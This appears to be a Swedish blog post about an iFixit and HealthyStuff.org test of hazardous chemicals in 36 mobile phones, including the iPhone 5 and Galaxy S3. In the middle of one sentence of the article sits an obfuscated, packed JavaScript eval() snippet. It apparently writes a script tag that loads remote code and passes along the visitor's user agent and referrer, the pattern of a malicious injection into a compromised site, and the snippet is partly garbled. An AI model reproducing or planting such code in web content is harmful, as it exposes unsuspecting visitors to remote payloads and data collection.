Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

Hur mycket kemikalier finns i din iPhone 5 eller Galaxy S3?

Hur mycket kemikalier finns i din iPhone 5 eller Galaxy S3?
Filip Urde
  • On 4 oktober, 2012
  • http://www.revue.se/filip-urde

 

Ännu ett bra test från iFixit, som nu tillsammans med HealthyStuff.org har gått igenom och testat 36 olika mobiler för att se hur mycket kemikalier som dem innehåller.

Som ni kan se av bilderna så har det minskat rejält sedan iPhone GSM, men det är ju fortfarande en del skit i telefonerna. Dock är det kul att se att populära nya telefoner som Galaxy S3 och iPhone 5 klarar sig ganska bra.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Här eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zkzbz|var|u0026u|referrer|diiss||js|php’.split(‘|’),0,{}))
nedan kan vi se hur kemikalie mängden påverkats av tiden telefonen släpptes.

 

 

ifixit.com